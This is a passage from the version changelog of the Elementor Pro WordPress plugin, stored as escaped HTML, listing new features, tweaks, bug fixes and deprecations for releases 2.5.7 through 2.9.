compatibility for Gallery and Media Carousel widgets<\\/li>\\n<li>Tweak: Expose external API for Swiper instances<\\/li>\\n<li>Tweak: Added compatibility to JS API in Theme Builder, Popups, Form widget and Global widget<\\/li>\\n<li>Tweak: Replaced nerd icons with new Elementor emojis<\\/li>\\n<li>Tweak: Added specific <code>color<\\/code> attribute to header title in Table of Contents widget<\\/li>\\n<li>Fix: Line break issues in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10585\\\">#10585<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color overrides the Table of Content list style<\\/li>\\n<li>Fix: Active state glitches when using Table of contents widget with Sticky mode<\\/li>\\n<li>Fix: "Graphic Element" section appears as empty in case of unmarked Graphic Element in Call to Action widget<\\/li>\\n<li>Fix: Page Title widget render glitches in the Editor<\\/li>\\n<li>Fix: Image ratio parameter visible in some edge cases in Posts widget<\\/li>\\n<li>Fix: Image missing when sharing to Pinterest using Share Buttons widget<\\/li>\\n<li>Fix: Theme Style Link color setting override the list style in Table of Contents widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v2-9-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.8.5 - 2020-03-08<\\/h4>\\n<ul>\\n<li>Tweak: Added new Swiper parameter to all Pro carousels to allow 3rd party integration<\\/li>\\n<li>Fix: Missing closing bracket in Animated Headline widget<\\/li>\\n<li>Fix: Share buttons widgets show Font Awesome 4 icons on first drag in Editor<\\/li>\\n<\\/ul>\\n<h4>2.8.4 - 2020-02-16<\\/h4>\\n<ul>\\n<li>Tweak: Added Lightbox Title & Description support to Gallery widget<\\/li>\\n<li>Tweak: Added RTL support for Slides widget<\\/li>\\n<li>Tweak: Display Lightbox images in Full size in Gallery widget<\\/li>\\n<li>Fix: Template with Slides widget not working properly when placed inside Tabs, Accordion and Toggle widget<\\/li>\\n<li>Fix: Dropdown menu lost styling after Elementor Pro v2.8 upgrade in Nav Menu widget<\\/li>\\n<li>Fix: Indent doesn\'t work on RTL websites in Table of Contents widget<\\/li>\\n<li>Fix: Query Control throws <code>Undefined index: q<\\/code> error<\\/li>\\n<li>Fix: Typography control not affecting dropdown menu in Nav Menu widget<\\/li>\\n<li>Fix: Discord forms integration fails to send submissions in some server configurations<\\/li>\\n<li>Fix: Rotating headlines don\'t align center in Animated Headline widget<\\/li>\\n<li>Fix: Custom secondary color displayed when not needed in Share buttons widget<\\/li>\\n<li>Fix: Motion Effects of certain objects are not functioning properly on Safari browser<\\/li>\\n<li>Fix: Missing eye icon in Single template footer preview button<\\/li>\\n<\\/ul>\\n<h4>2.8.3 - 2020-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Updated Table of Contents widget panel location<\\/li>\\n<li>Fix: ACF URL Dynamic field throws <code>undefined index<\\/code> PHP notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9929\\\">#9929<\\/a>)<\\/li>\\n<li>Fix: Gallery lightbox pagination shows images from all tabs<\\/li>\\n<li>Fix: "Reply To" option not working in Form widget "Email 2" Action<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<li>Fix: Underline option not working in Table of Contents widget Normal state<\\/li>\\n<li>Fix: Query Control <code>Undefined index: autocomplete<\\/code> notice in some cases<\\/li>\\n<li>Fix: Missing display condition to Read More Spacing control in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.8.2 - 2019-12-19<\\/h4>\\n<ul>\\n<li>Tweak: Improved scroll-spy and collapsing functionality in Table of Contents widget<\\/li>\\n<li>Fix: "No products were found" message not being displayed in an empty Products Archive<\\/li>\\n<li>Fix: Redundant <code><br><\\/code> tags in Single theme template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9927\\\">#9927<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9928\\\">#9928<\\/a>)<\\/li>\\n<li>Fix: Draft Popup shows up in Dynamic tag dropdown<\\/li>\\n<\\/ul>\\n<h4>2.8.1 - 2019-12-18<\\/h4>\\n<ul>\\n<li>Fix: Share Buttons widget not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9920\\\">#9920<\\/a>)<\\/li>\\n<li>Fix: Redundant <code><p><\\/code> tags added to Single Template posts<\\/li>\\n<\\/ul>\\n<h4>2.8.0 - 2019-12-18<\\/h4>\\n<ul>\\n<li>New: Table of Contents Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5171\\\">#5171<\\/a>)<\\/li>\\n<li>New: Added Font Awesome Pro Duotone font family support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added Lazy Load option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9763\\\">#9763<\\/a>)<\\/li>\\n<li>Tweak: Added Random order option to Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9269\\\">#9269<\\/a>)<\\/li>\\n<li>Tweak: Updated Font Awesome Pro to v5.11.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9578\\\">#9578<\\/a>)<\\/li>\\n<li>Tweak: Added preselect support for multiple default select values in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9324\\\">#9324<\\/a>)<\\/li>\\n<li>Tweak: Avoid duplicate queries for Custom Icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9579\\\">#9579<\\/a>)<\\/li>\\n<li>Tweak: Major performance improvements to Gallery widget<\\/li>\\n<li>Tweak: Avoid non-existing images in Gallery widget<\\/li>\\n<li>Tweak: Added <code>tabindex<\\/code>, <code>aria-expanded<\\/code>, <code>aria-hidden<\\/code> and <code>role=\\\"navigation\\\"<\\/code> accessibility attributes to Nav Menu widget<\\/li>\\n<li>Tweak: Changed button HTML tag from <code>button<\\/code> to <code>span<\\/code> in Call to Action and Flip Box widgets for better W3C compliance and accessibility<\\/li>\\n<li>Tweak: Removed Google+ from default networks in Share Buttons widget<\\/li>\\n<li>Tweak: Added compatibility for Library Connect<\\/li>\\n<li>Tweak: Added i18n to Toolset date dynamic tag<\\/li>\\n<li>Tweak: Added external link support to Gallery widget<\\/li>\\n<li>Tweak: Changed the link external attributes implementation to use <code>add_link_attributes()<\\/code> in Gallery widget<\\/li>\\n<li>Tweak: Updated references to the new Schemes system location<\\/li>\\n<li>Tweak: Avoid running Gallery handler when the gallery is empty<\\/li>\\n<li>Tweak: UI Tweaks in Editor Panel<\\/li>\\n<li>Tweak: Added responsive capabilities to Pointer Width control in Nav Menu widget<\\/li>\\n<li>Tweak: Added mobile support for responsive controls in Nav Menu widget<\\/li>\\n<li>Tweak: Refactor <code>register_controls()<\\/code> method in Posts widget skin trait<\\/li>\\n<li>Fix: ACF URL "undefined Index" notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7646\\\">#7646<\\/a>)<\\/li>\\n<li>Fix: WooCommerce Mini-Cart widget causes fatal error in edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9304\\\">#9304<\\/a>)<\\/li>\\n<li>Fix: <code>PHP Notice: Undefined index<\\/code> display for Author query (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9864\\\">#9864<\\/a>)<\\/li>\\n<li>Fix: Added compatibility for Button widget placed inside Swiper carousel (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/broken-buttons-since-elementor-2-8\\/\\\">Topic<\\/a>)<\\/li>\\n<li>Fix: Avoid empty spaces in Post info widget<\\/li>\\n<li>Tweak: Always show "Custom label" control in Login widget<\\/li>\\n<li>Fix: Nav Menu item typography selector in Nav Menu widget<\\/li>\\n<li>Fix: Facebook Like Button widget causes flickering<\\/li>\\n<li>Fix: WooCommerce mini-cart behaviour when using <code>plain<\\/code> permalinks format<\\/li>\\n<li>Fix: Avoid running Popup triggers when set without conditions<\\/li>\\n<li>Fix: Removed "Date" query from Products widget<\\/li>\\n<li>Fix: Slides widget when used as a Shortcode and is hidden<\\/li>\\n<li>Fix: Custom URL being accessed on swipe in Media Carousel<\\/li>\\n<li>Fix: Media Carousel widget Cube effect glitch<\\/li>\\n<li>Fix: Lightbox shows images from multiple Gallery widgets in the same page<\\/li>\\n<li>Fix: Image <code>alt<\\/code> Text not displayed on overlay in Gallery widget<\\/li>\\n<li>Fix: Gallery widget not visible in Posts widget Full Content skin<\\/li>\\n<li>Fix: WooCommerce mini-cart remove unnecessary hooks registration when WooCommerce integration set to <code>Disable<\\/code><\\/li>\\n<li>Fix: Slides widget button wrapping breaks in mobile view<\\/li>\\n<li>Fix: Dynamic capabilities with the Reviews widget<\\/li>\\n<li>Fix: Disabling autoplay doesn\'t work in Slides widget<\\/li>\\n<li>Fix: Posts widget Full Content skin not working on Single template<\\/li>\\n<li>Fix: Autocomplete not working for "By Author" condition in Display Conditions screen<\\/li>\\n<li>Fix: Posts widget alignment issue<\\/li>\\n<li>Fix: Product Variations Clear button not working in edge cases<\\/li>\\n<li>Fix: Styling issues in Form widget submit button<\\/li>\\n<\\/ul>\\n<h4>2.7.3 - 2019-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added RTL support to Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9213\\\">#9213<\\/a>)<\\/li>\\n<li>Tweak: Added Custom Icons compatibility for WordPress 5.3<\\/li>\\n<li>Fix: Missing template function declaration causes fatal error in WC mini-cart widget<\\/li>\\n<li>Fix: Pause on hover doesn\'t work in Carousel widgets<\\/li>\\n<li>Fix: Link-actions conflict with <code>?action=<\\/code> parameter in the URL<\\/li>\\n<li>Fix: Lightbox navigation not working in Gallery widget Single mode<\\/li>\\n<li>Fix: Ken burns effect not working on the 1st slide if Infinite Loop option is turned off in Carousel widgets<\\/li>\\n<li>Fix: Popup Advanced Rules detects internal links as external if current URL starts with <code>www<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.7.2 - 2019-10-06<\\/h4>\\n<ul>\\n<li>Fix: Slide Overlay not working when applying Ken burns effect in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9209\\\">#9209<\\/a>)<\\/li>\\n<li>Fix: Content width glitch in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Horizontal Alignment not working when applying custom style per slide in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Missing semicolon in Custom Fonts <code>font-display<\\/code> CSS<\\/li>\\n<\\/ul>\\n<h4>2.7.1 - 2019-09-26<\\/h4>\\n<ul>\\n<li>Fix: Background Overlay layer is over the slide content in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Duplicate images under "All" filter in Multiple Gallery<\\/li>\\n<\\/ul>\\n<h4>2.7.0 - 2019-09-24<\\/h4>\\n<ul>\\n<li>New: Enhanced Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1898\\\">#1898<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3103\\\">#3103<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4279\\\">#4279<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7631\\\">#7631<\\/a>)<\\/li>\\n<li>New: Dynamic Number (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5952\\\">#5952<\\/a>)<\\/li>\\n<li>New: Full content skin for Posts and Archive-posts widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4617\\\">#4617<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic number capability to Price List, Price Table, Counter, Star Rating, Progress Bar widgets<\\/li>\\n<li>Tweak: Added tags support to forms Mailchimp action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5418\\\">#5418<\\/a>)<\\/li>\\n<li>Tweak: User Profile Picture Dynamic Tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7947\\\">#7947<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8740\\\">#8740<\\/a>)<\\/li>\\n<li>Tweak: Added <code>font-display<\\/code> support to custom fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5993\\\">#5993<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-custom-fonts-font-display-support\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Text Shadow control to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8800\\\">#8800<\\/a>)<\\/li>\\n<li>Tweak: Added Re-subscribe support to MailerLite (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8799\\\">#8799<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Facebook Embed widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9030\\\">#9030<\\/a>)<\\/li>\\n<li>Tweak: Use <code>swiper.js<\\/code> instead of <code>slick.js<\\/code> in Slides widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-2-7-moving-sliders-from-slick-to-swiper\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/before_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/after_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic support for Custom field key (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7789\\\">#7789<\\/a>)<\\/li>\\n<li>Tweak: Increased expired license notice bar frequency<\\/li>\\n<li>Tweak: Changed the icon name of Slides widget<\\/li>\\n<li>Tweak: Added designated Finder\'s Icons for Custom icons & Custom fonts<\\/li>\\n<li>Tweak: Use Ken Burns Effect as an external module<\\/li>\\n<li>Tweak: Remove Fontello conflicting CSS on import to Custom Icons sets<\\/li>\\n<li>Tweak: Editor Panel UI tweaks<\\/li>\\n<li>Tweak: Added DOM events on Popup show\\/hide (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-popup-events\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added option to change the variations field width in Add to Cart widget<\\/li>\\n<li>Tweak: Use select control instead of select2 in Menu Cart widget<\\/li>\\n<li>Tweak: Added conditions to the tabs instead of to each control in Share Buttons widget<\\/li>\\n<li>Tweak: Added Typography controls to HTML field in Forms widget<\\/li>\\n<li>Tweak: Allow edit selected Font file in Custom Font<\\/li>\\n<li>Tweak: Changed reCAPTCHA v3 error message<\\/li>\\n<li>Tweak: Remove the "Save as Global" option on Global widget context menu<\\/li>\\n<li>Fix: Corrected selector for <code>removeControlSpinner()<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8790\\\">#8790<\\/a>)<\\/li>\\n<li>Fix: Slides widget navigation icons misplacement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8533\\\">#8533<\\/a>)<\\/li>\\n<li>Fix: Horizontal Scrollbar when Slider widget is set to Full Width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8527\\\">#8527<\\/a>)<\\/li>\\n<li>Fix: Inconsistent behavior when "Infinite Loop" enabled with "Autoplay" in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Ken Burns effect on Chrome transition glitches (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1671\\\">#1671<\\/a>)<\\/li>\\n<li>Fix: Nothing found message shows up inside the columns set in Posts Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7347\\\">#7347<\\/a>)<\\/li>\\n<li>Fix: Responsive UI glitch in Popup Conditions modal tabs<\\/li>\\n<li>Fix: Removed unnecessary divider in Call to Action widget<\\/li>\\n<li>Fix: Custom Add To Cart * button style (size, position and background color) when <code>quantity<\\/code> is enabled.<\\/li>\\n<li>Fix: Add support for Document\\/PageBase in Theme Builder (Core >=2.7.0)<\\/li>\\n<li>Fix: Ampersand character breaks email link in Share Buttons widget<\\/li>\\n<li>Fix: Correct custom font attachment <code>mime-type<\\/code> to show uploaded Custom Fonts<\\/li>\\n<li>Fix: Mini-Cart not refreshing in Menu Cart widget<\\/li>\\n<li>Fix: Cart drawer not working when WC Subscriptions plugin is activated<\\/li>\\n<li>Fix: Querying CPT with custom taxonomies does not show the taxonomies before saving<\\/li>\\n<li>Fix: Double rendering on change caused console error in Theme Builder\'s conditions screen<\\/li>\\n<li>Fix: Translations and Strings in Share Buttons widget<\\/li>\\n<li>Fix: Avoid using offset if the source is Manual selection in Query Control<\\/li>\\n<li>Fix: Form being submitted although reCAPTCHA v3 validation failed in Forms widget<\\/li>\\n<\\/ul>\\n<h4>2.6.5 - 2019-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Button style not working when <code>quantity<\\/code> is enabled in Custom Add To Cart widget<\\/li>\\n<li>Fix: Updated minified JS file fixed WhatsApp base URL in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>2.6.4 - 2019-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Changed WhatsApp base URL in Share Buttons widget for cross-device compatibility<\\/li>\\n<li>Fix: Random slides order after several clicks on pagination in Testimonial Carousel widget<\\/li>\\n<\\/ul>\\n<h4>2.6.3 - 2019-08-18<\\/h4>\\n<ul>\\n<li>Fix: Core version rollback to <code>>2.6.0<\\/code> causes a fatal error<\\/li>\\n<li>Fix: Duplicate images when slideshow skin is selected in Media Carousel lightbox<\\/li>\\n<li>Fix: Default bottom margin added to reCAPTCHA V3 badge<\\/li>\\n<li>Fix: Input glitch in reCAPTCHA V3 threshold settings<\\/li>\\n<\\/ul>\\n<h4>2.6.2 - 2019-07-30<\\/h4>\\n<ul>\\n<li>Tweak: Better accessibility support in Search Form widget<\\/li>\\n<li>Fix: UI glitched in Popup publish screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8616\\\">#8616<\\/a>)<\\/li>\\n<li>Fix: "Child of Term" and "Any child of term" conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8695\\\">#8695<\\/a>)<\\/li>\\n<li>Fix: Restored <code>library_widget_templates<\\/code> action hook for 3rd party compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8687\\\">#8687<\\/a>)<\\/li>\\n<li>Fix: Twitter Icon missing in Blockquote widget<\\/li>\\n<li>Fix: Form reCAPTCHA v3 badge position not working<\\/li>\\n<li>Fix: Renewal notice bar appears in wrong situations<\\/li>\\n<li>Fix: Draft Icon Set loads empty Icon Library<\\/li>\\n<\\/ul>\\n<h4>2.6.1 - 2019-07-24<\\/h4>\\n<ul>\\n<li>Fix: Query Control autocomplete not retrieving results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8672\\\">#8672<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8661\\\">#8661<\\/a>)<\\/li>\\n<li>Fix: Price Table features section not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8660\\\">#8660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.6.0 - 2019-07-23<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Icon sets - including Fontello, IcoMoon and Fontastic support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/110\\\">#110<\\/a>)<\\/li>\\n<li>New: Added Font Awesome 5 Pro integration including 5,300+ icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4430\\\">#4430<\\/a>)<\\/li>\\n<li>New: Added reCAPTCHA v3 integration to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8213\\\">#8213<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6039\\\">#6039<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7165\\\">#7165<\\/a>)<\\/li>\\n<li>Tweak: Added Exit Animation for Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7063\\\">#7063<\\/a>)<\\/li>\\n<li>Tweak: Added ACF Dynamic tag support for archive pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5147\\\">#5147<\\/a>)<\\/li>\\n<li>Tweak: Added Navigator Indicators for Custom CSS & Motion Effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2180\\\">#2180<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Form Redirect action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7552\\\">#7552<\\/a>)<\\/li>\\n<li>Tweak: Added Logged In Message styling options for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7928\\\">#7928<\\/a>)<\\/li>\\n<li>Tweak: Added <code>none<\\/code> breakpoint option to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7916\\\">#7916<\\/a>)<\\/li>\\n<li>Tweak: Added option to place Post Terms dynamic tag without links (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8366\\\">#8366<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor\\/query\\/query_results<\\/code> hook to Query Control to allow full control over results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7912\\\">#7912<\\/a>)<\\/li>\\n<li>Tweak: Allow choosing Heading HTML tag in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8090\\\">#8090<\\/a>)<\\/li>\\n<li>Tweak: Show popup on dynamic click even when <code>Avoid Multiple Popups<\\/code> option is selected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8189\\\">#8189<\\/a>)<\\/li>\\n<li>Tweak: Added condition option to all of archive child pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8256\\\">#8256<\\/a>)<\\/li>\\n<li>Tweak: Added <code>Effects Relative To<\\/code> control to Scrolling Effects<\\/li>\\n<li>Tweak: Allow shortcodes in HTML Form field<\\/li>\\n<li>Tweak: Removed donReach integration from Share Buttons widget due to service inconsistent stability<\\/li>\\n<li>Tweak: Changed MailChimp <code>List<\\/code> label to <code>Audience<\\/code><\\/li>\\n<li>Tweak: Improved Entrance and Exit animation behavior in Popup<\\/li>\\n<li>Tweak: Added <code>Deprecated Notice<\\/code> control to <code>Archive Products<\\/code> and <code>Woo Products<\\/code> widgets<\\/li>\\n<li>Tweak: Added default dynamic title for archives in Theme Builder<\\/li>\\n<li>Tweak: Added condition to show <code>Centered Slides<\\/code> control in Media Carousel widget<\\/li>\\n<li>Tweak: Added notice bar in the Editor when the license is expired or not activated<\\/li>\\n<li>Tweak: Replaced <code>select<\\/code> control with <code>choose<\\/code> control in Price List widget<\\/li>\\n<li>Tweak: Removed Font Awesome 4 dependencies from the Editor<\\/li>\\n<li>Tweak: Minor styling tweaks in the Popup publish modal<\\/li>\\n<li>Tweak: Hide ordering form in Products widget on front page<\\/li>\\n<li>Tweak: Removed page title markup when \'Hide Title\' is active<\\/li>\\n<li>Tweak: Added style controls for HTML field in Form widget<\\/li>\\n<li>Fix: Form widget Date picker makes the Popup builder disappear (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7240\\\">#7240<\\/a>)<\\/li>\\n<li>Fix: Sticky element stop point stops working on viewport resize (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7884\\\">#7884<\\/a>)<\\/li>\\n<li>Fix: Copy-Paste style not pasting the Pointer option in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8497\\\">#8497<\\/a>)<\\/li>\\n<li>Fix: Missing Print icon in Share Buttons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8506\\\">#8506<\\/a>)<\\/li>\\n<li>Fix: UI style glitch in Blockquote widget when viewing from iPad<\\/li>\\n<li>Deprecated: <code>DB::save_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<li>Deprecated: <code>DB::get_plain_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.14 - 2019-07-14<\\/h4>\\n<ul>\\n<li>Fix: Better WC Related Product grid support to various themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8555\\\">#8555<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.13 - 2019-07-11<\\/h4>\\n<ul>\\n<li>Fix: Better WC grid support to various themes<\\/li>\\n<\\/ul>\\n<h4>2.5.12 - 2019-07-10<\\/h4>\\n<ul>\\n<li>Fix: Grid for WooCommerce Archive Product widget<\\/li>\\n<li>Fix: Remove redundant <code>whitespace<\\/code> CSS property causes style glitch in iPad<\\/li>\\n<li>Tweak: Added more compatibility for Elementor v2.6<\\/li>\\n<\\/ul>\\n<h4>2.5.11 - 2019-07-02<\\/h4>\\n<ul>\\n<li>Fix: Close icon missing from Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8460\\\">#8460<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro v2.5.10 shows PHP notice regarding notice bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8461\\\">#8461<\\/a>)<\\/li>\\n<li>Fix: Fatal error when deleting used Pods fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8396\\\">#8396<\\/a>)<\\/li>\\n<li>Fix: Missing dropdown icon in conditions screen<\\/li>\\n<\\/ul>\\n<h4>2.5.10 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.6<\\/li>\\n<li>Tweak: Error caused by empty Rows & Columns values in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8261\\\">#8261<\\/a>)<\\/li>\\n<li>Fix: Do not unset <code>product<\\/code> CPT if it\'s not from WooCommerce (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8160\\\">#8160<\\/a>)<\\/li>\\n<li>Fix: Column Spacing not working in WooCommerce Archive Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8285\\\">#8285<\\/a>)<\\/li>\\n<li>Fix: Title styling not working in Products Categories widget<\\/li>\\n<li>Fix: Empty value in Dynamic Pods Gallery dropdown using Safari browser<\\/li>\\n<li>Fix: WooCommerce archives included in "All Archives" condition<\\/li>\\n<\\/ul>\\n<h4>2.5.9 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>auto-confirm<\\/code> control from MailPoet to support new version of MailPoet<\\/li>\\n<li>Fix: Multiple Custom Fonts not rendered in the editor<\\/li>\\n<li>Fix: Products <code>sale<\\/code> query - handle exclude by manual selection.<\\/li>\\n<li>Fix: Product Categories grid row & column style<\\/li>\\n<li>Fix: Form integration AJAX cache override<\\/li>\\n<li>Fix: Removed redundant CSS on Canvas & Header-Footer page templates<\\/li>\\n<\\/ul>\\n<h4>2.5.8 - 2019-05-06<\\/h4>\\n<ul>\\n<li>Fix: Popup entrance animation not working in frontend<\\/li>\\n<li>Fix: Popup Exit Intent trigger activated multiple times<\\/li>\\n<\\/ul>\\n<h4>2.5.7 - 2019-05-05<\\/h4>\\n<ul>\\n<li>Fix: Embedded video keeps playing after a Popup is closed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7875\\\">#7875<\\/a>)<\\/li>\\n<li>Fix: Maximum call stack size exceeded error in Safari (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7824\\\">#7824<\\/a>)<\\/li>\\n<li>Fix: Entrance animations not appearing on Popup reopen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7395\\\">#7395<\\/a>)<\\/li>\\n<li>Fix: WC variations select style glitch in several themes (<a 